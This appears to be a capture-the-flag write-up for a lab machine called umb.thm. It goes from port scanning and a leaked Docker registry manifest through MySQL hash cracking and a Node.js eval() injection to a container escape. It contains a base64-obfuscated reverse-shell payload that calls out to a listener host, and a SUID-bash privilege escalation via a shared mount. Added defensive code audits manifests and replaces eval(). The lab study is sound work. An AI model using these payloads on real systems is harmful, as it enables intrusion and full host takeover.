Port scan

nmap --min-rate=10000 -p- umb.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-26 12:01 UTC
Nmap scan report for umb.thm (10.10.227.222)
Host is up (0.0100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3306/tcp open mysql
5000/tcp open upnp
8080/tcp open http-proxy
MAC Address: 02:51:6F:5C:2F:11 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds

nmap -sC -sT -sV -O -p22,3306,5000,8080 umb.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-26 12:02 UTC
Nmap scan report for umb.thm (10.10.227.222)
Host is up (0.00060s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f0142fd6f6768c589a8e846ab1fbb99f (RSA)
| 256 8a52f1d6ea6d18b26f26ca8987c9496d (ECDSA)
|_ 256 4b0d622a795ca07bc4f46c763c227ff9 (ED25519)
3306/tcp open mysql MySQL 5.7.40
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.40_Auto_Generated_Server_Certificate
| Not valid before: 2022-12-22T10:04:49
|_Not valid after: 2032-12-19T10:04:49
| mysql-info:
| Protocol: 10
| Version: 5.7.40
| Thread ID: 5
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, IgnoreSigpipes, LongPassword, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ODBCClient, LongColumnFlag, SupportsLoadDataLocal, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, DontAllowDatabaseTableColumn, FoundRows, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: \x11\x0B\x0F`;o\x19%"hW\x18-p^\x0B\x1A\x02^\x02
|_ Auth Plugin Name: mysql_native_password
5000/tcp open http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
8080/tcp open http Node.js (Express middleware)
|_http-title: Login
MAC Address: 02:51:6F:5C:2F:11 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds

Getting a shell

Port 3306 is reachable from outside; brute-forcing it got nowhere.

Port 5000 is a Docker Registry.

Following https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry, we find that this registry holds a single image:

curl -s 'http://umb.thm:5000/v2/umbrella/timetracking/tags/list'
{"name":"umbrella/timetracking","tags":["latest"]}

Pulling the image fails, though; from the error, the Docker client insists on HTTPS while the registry answers over plain HTTP.

docker pull umb.thm:5000/umbrella/timetracking
Using default tag: latest
Error response from daemon: Get "https://umb.thm:5000/v2/": http: server gave HTTP response to HTTPS client

Earlier, however, curling /v2/umbrella/timetracking/manifests/latest also exposed the image's build history, and the database credentials are in it:

DB_USER=root,DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5
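
The leak above comes from a Dockerfile ENV instruction that is recorded in the image's layer history. The script below is an added example, not part of this writeup or the room, for auditing your own registry: it takes a schema-1 manifest as returned by GET /v2/<name>/manifests/<tag> and reports every layer whose environment carries a variable with a credential-looking name, without printing the value. The manifest embedded here is a constructed sample and its credential value is a placeholder; the regex of suspicious names is an assumption to adjust for your environment.

```javascript
// Added example, not from the original writeup: audit a Docker Registry v2
// schema-1 manifest for environment variables whose names suggest secrets.
// Each history entry carries a v1Compatibility JSON string holding the
// layer's config, which is where a Dockerfile ENV instruction ends up.

// Names that usually denote secrets (assumption; extend to taste).
const SECRET_NAME = /PASS|PASSWORD|SECRET|TOKEN|(?:^|_)KEY|CREDENTIAL/i;

// Constructed sample manifest; the credential value is a placeholder.
const SAMPLE_MANIFEST = {
  schemaVersion: 1,
  name: 'example/app',
  tag: 'latest',
  history: [
    {
      v1Compatibility: JSON.stringify({
        id: 'layer0-constructed',
        container_config: {
          Cmd: ['/bin/sh', '-c', '#(nop)  ENV DB_PASS=placeholder-not-a-real-secret'],
        },
        config: {
          Env: ['PATH=/usr/local/bin:/usr/bin', 'DB_USER=root',
                'DB_PASS=placeholder-not-a-real-secret'],
        },
      }),
    },
    {
      v1Compatibility: JSON.stringify({
        id: 'layer1-constructed',
        config: { Env: ['PATH=/usr/local/bin:/usr/bin'] },
      }),
    },
  ],
};

// Returns one finding per (layer, variable name). Values are deliberately
// left out so the report itself does not spread the secret further.
function findLeakedEnv(manifest) {
  const seen = new Set();
  const findings = [];
  const report = (layer, name, source) => {
    const key = `${layer}:${name}`;
    if (seen.has(key) || !SECRET_NAME.test(name)) return;
    seen.add(key);
    findings.push({ layer, name, source });
  };

  (manifest.history || []).forEach((entry, i) => {
    let layer;
    try { layer = JSON.parse(entry.v1Compatibility); } catch { return; }

    // Environment as recorded in the layer's config blocks.
    for (const cfgKey of ['config', 'container_config']) {
      const env = (layer[cfgKey] && layer[cfgKey].Env) || [];
      for (const kv of env) report(i, kv.split('=')[0], `${cfgKey}.Env`);
    }
    // The Dockerfile instruction that created the layer, e.g. "#(nop)  ENV X=y".
    const cmd = (layer.container_config && layer.container_config.Cmd) || [];
    for (const c of cmd) {
      const m = /#\(nop\)\s+ENV\s+([A-Za-z_][A-Za-z0-9_]*)=/.exec(c);
      if (m) report(i, m[1], 'container_config.Cmd');
    }
  });
  return findings;
}

console.log(findLeakedEnv(SAMPLE_MANIFEST)); // [{ layer: 0, name: 'DB_PASS', source: 'config.Env' }]
```

In practice you would feed it the manifest fetched from your registry with curl, as the writeup does. A hit means the secret is baked into a layer and visible to anyone who can read the registry, so rotating the credential is necessary; the registry should also not be reachable without TLS and authentication in the first place.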

Connecting to the database remotely, the users table contains four users:

mysql -h umb.thm -u root -p
MySQL [timetracking]> select * from users;
+----------+----------------------------------+-------+
| user | pass | time |
+----------+----------------------------------+-------+
| claire-r | 2ac9cb7dc02b3c0083eb70898e549b63 | 360 |
| chris-r | 0d107d09f5bbe40cade3de5c71e9e9b7 | 420 |
| jill-v | d5c0607301ad5d5c1528962a83992ac8 | 564 |
| barry-b | 4a04890400b5d7bac101baace5d7e994 | 47893 |
+----------+----------------------------------+-------+
4 rows in set (0.266 sec)

Cracking the MD5 hashes with an online lookup:

claire-r | Password1
chris-r | letmein
jill-v | sunshine1
barry-b | sandwich

Although port 8080 has a Node.js login page, try SSH first.

It turns out claire-r can log straight in over SSH, which is a bit absurd...

Docker escape

Checking the IP address shows we are not inside a Docker container, so there is no escape to do yet.

I had wanted to try local privilege escalation through MySQL, but the preconditions for it are not met. The plan now is to pivot to the user account, and port 8080 looks usable for that.

The docker-compose file mounts a log directory into the container as /logs. It is reasonable to suspect the Node.js app on 8080 is run by the user account, so a reverse shell from it should land as user.

Log into the Node.js app on 8080 with claire-r's credentials again.

The page lets you add to the time shown below. The source of app.js is viewable as well; not being very familiar with Node.js, I had GPT analyse it.

When the form is submitted, a request carrying a time parameter goes to the /time route, where the value is evaluated with eval(). Besides arithmetic, eval() can be made to execute commands.
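
To make the root cause concrete, here is an added example (not the room's app.js, whose source is not reproduced in this writeup) showing the eval-based pattern described above beside a hardened replacement. All function names, the minute bound and the in-memory store are hypothetical; the handler mirrors the shape of an Express POST /time route without depending on Express.

```javascript
// Added example, not the room's app.js: the `time` parameter handed to
// eval(), beside a version that parses it as a bounded integer instead.

// Vulnerable form. eval() runs whatever JavaScript the client sends, so a
// string that is not a number is interpreted rather than rejected.
function addTimeUnsafe(currentMinutes, timeParam) {
  return currentMinutes + eval(timeParam); // eslint-disable-line no-eval
}

// Hardened form. Only a short string of digits is accepted, converted with
// Number() and never interpreted. A bound keeps one request from booking an
// absurd amount of time (the limit itself is an assumption).
const MAX_MINUTES_PER_ENTRY = 24 * 60;

function parseMinutes(timeParam) {
  if (typeof timeParam !== 'string') return null;
  if (!/^\d{1,5}$/.test(timeParam)) return null; // digits only: no sign, spaces or operators
  const n = Number(timeParam);
  return n > 0 && n <= MAX_MINUTES_PER_ENTRY ? n : null;
}

function addTimeSafe(currentMinutes, timeParam) {
  const n = parseMinutes(timeParam);
  if (n === null) throw new TypeError('time must be a positive whole number of minutes');
  return currentMinutes + n;
}

// Express-style handler for POST /time, returning {status, body} instead of
// writing to a response. `store` stands in for the users table's time column.
function handleTimeRequest(req, store) {
  const n = parseMinutes(req.body && req.body.time);
  if (n === null) {
    return { status: 400, body: 'time must be a positive whole number of minutes' };
  }
  store[req.user] = (store[req.user] || 0) + n;
  return { status: 200, body: { user: req.user, time: store[req.user] } };
}

// Constructed demonstration input.
console.log(addTimeUnsafe(360, '1+1'));  // an expression, evaluated: 362
console.log(handleTimeRequest({ user: 'alice', body: { time: '60' } }, { alice: 360 }));
console.log(handleTimeRequest({ user: 'alice', body: { time: '1+1' } }, { alice: 360 }).status); // 400
```

The unsafe function shows the whole problem in one line: '1+1' is arithmetic today, but the same code path accepts any expression the runtime can evaluate. The fix is not to sanitise the string for eval() but to stop evaluating it at all; once the value is a validated integer it can be written to the database with a parameterised query.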

Start a listener and turn that command execution into a reverse shell:

require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMS43Ny4yOC8xMjM0IDA+JjE= | base64 -d | bash').toString();

What we get, however, is root inside the container. Heading to the /logs mount from earlier: the container's /logs directory is shared with the log directory on the host, so whatever is written there appears on the host too.

Inside the container:

cp /bin/bash /log/root_bash

chmod +xs /log/root_bash

On the host:

./root_bash -p

Now we are ROOT!

Afterthoughts

The new part was the Docker Registry service on port 5000; what followed, both the Node.js RCE and the container escape, I had already run into plenty of times. In fact, getting the user account was never necessary.